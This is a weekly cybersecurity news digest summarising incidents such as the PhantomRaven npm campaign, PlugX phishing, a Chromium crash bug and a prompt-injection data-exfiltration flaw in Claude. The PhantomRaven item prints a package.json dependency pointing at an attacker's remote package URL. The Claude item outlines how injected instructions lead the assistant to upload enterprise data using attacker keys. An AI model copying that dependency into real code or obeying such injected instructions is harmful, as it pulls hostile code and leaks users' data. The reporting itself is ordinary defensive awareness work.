
This weeks news made me think that maybe in our vendor review policies we shouldn’t only be happy when a company has chosen to have a nice bugy boundy on HackerOne or elsewhere but we should also pay a bit of attention to the policy that bounty program has and would things that we would consider serious violations get accepted or rejected in the program? I am not sure Anthropics program would pass my review today. Read item 5 to understand why.
Between September and October 2025, the China-affiliated group UNC6384 sent spear-phishing emails to European diplomatic and government entities, exploiting the unpatched Windows shortcut vulnerability CVE-2025-9491/ZDI-CAN-25373. Malicious LNK files triggered a multi-stage chain—using a decoy PDF, PowerShell scripts, DLL side-loading of a Canon utility, and an encrypted PlugX payload to establish persistent remote access.
Key Details
Next Steps
Read more at The Hacker News
Ribbon Communications disclosed that suspected nation-state hackers infiltrated its network as early as December 2024, remaining undetected until September 2025. There is no evidence of material data exfiltration.
Key Details
Read more at Dark Reading
Security researchers uncovered a supply chain campaign named PhantomRaven that has embedded Remote Dynamic Dependencies into 126 npm packages since August 2025, amassing over 86,000 downloads and exfiltrating developer tokens and CI/CD secrets. The hidden HTTP-based dependencies evade static scanning, posing significant risk to development environments and CI pipelines.
Key Details
"dependencies": {
"express": "^4.18.0"
}"dependencies": {
"ui-styles-pkg": "http://packages.storeartifact.com/npm/unused-imports"
}Next Steps
Read more at Koi Security Blog, Cybersecurity News
Aardvark embeds into CI/CD pipelines to continuously scan code with GPT-5 reasoning, validate exploitability in sandboxes, and propose Codex-generated patches for human review.
Key Details
Read more at OpenAI, The Hacker News
A flaw in Anthropic’s Claude AI lets attackers use indirect prompt injection to exfiltrate enterprise data by uploading files through the platform’s own API infrastructure using attacker-controlled keys. Default network restrictions ("Package managers only") fail to block this channel, leaving sensitive chat logs, documents, and integrated service data at risk without obvious indicators.Key Details
Next Steps
Read more at CSO Online
Researchers at Varonis have identified a new malware-as-a-service toolkit, dubbed Atroposia, that for $200 per month offers remote access, stealthy shadow RDP sessions, credential theft, DNS hijacking and an integrated vulnerability scanner. By automating reconnaissance, persistence and exfiltration in a single, low-skill platform, Atroposia compresses the traditional attack chain and significantly raises the stakes for enterprise defenders.
Key Details
Read more at CSO Online, Varonis
A critical flaw in Chromium’s Blink engine lets attackers crash Chrome, Edge, Brave and other Chromium browsers in 15–60 seconds by flooding document.title updates.
This makes it trivial to launch widespread denial-of-service attacks against everyday web users, but also presents serious risks to businesses that rely on web-based dashboards and headless browsers.
For example, a single malicious link could silently crash a fleet of headless Chrome instances used by AI agents for market research, bring down a surgeon’s browser-based navigation system mid-procedure, or paralyze online trading desks at the opening bell.
Because the exploit can be delayed or scheduled, attackers could time it to coincide with high-stakes events—such as peak e-commerce transactions or financial market openings—multiplying the potential damage.
Key Details
Read more at The Hacker News, CSO Online, Cybersecurity News
In September 2025, over 500 GB of internal documentation from China’s Great Firewall was leaked, revealing source code, configuration files, traffic logs, and packet captures that outline the censorship system’s architecture and enforcement rules. Embedded metadata links files to individual operators and network components, offering researchers and threat actors a detailed blueprint to identify vulnerabilities and develop evasion techniques.
Key Details
Read more at Cybersecurity News
Svenska kraftnät has confirmed unauthorized access to a “limited external file transfer solution” after the Everest ransomware gang claimed to have exfiltrated roughly 280 GB of internal data. The breach did not disrupt Sweden’s power supply, but sensitive schematics and employee information may be at risk. The operator is working with police and national cybersecurity authorities to assess exposure and contain the incident.
Key Details
Read more at Svenska kraftnät, Everest Ransom_DB on X, The Record
Aembit has extended its Workload IAM platform with Blended Identity and an MCP Identity Gateway to assign unique, cryptographically verified identities to autonomous AI agents, enforce least-privilege access at runtime, and record every access decision. This addresses the lack of tailored access controls for self-driven AI in hybrid environments, enabling security teams to maintain auditability, revoke permissions immediately, and close the gap between AI adoption and secure governance.
Key Details
Read more at CSO Online, HackRead
Subscribe to receive this weekly cybersecurity news summary to your inbox every Monday.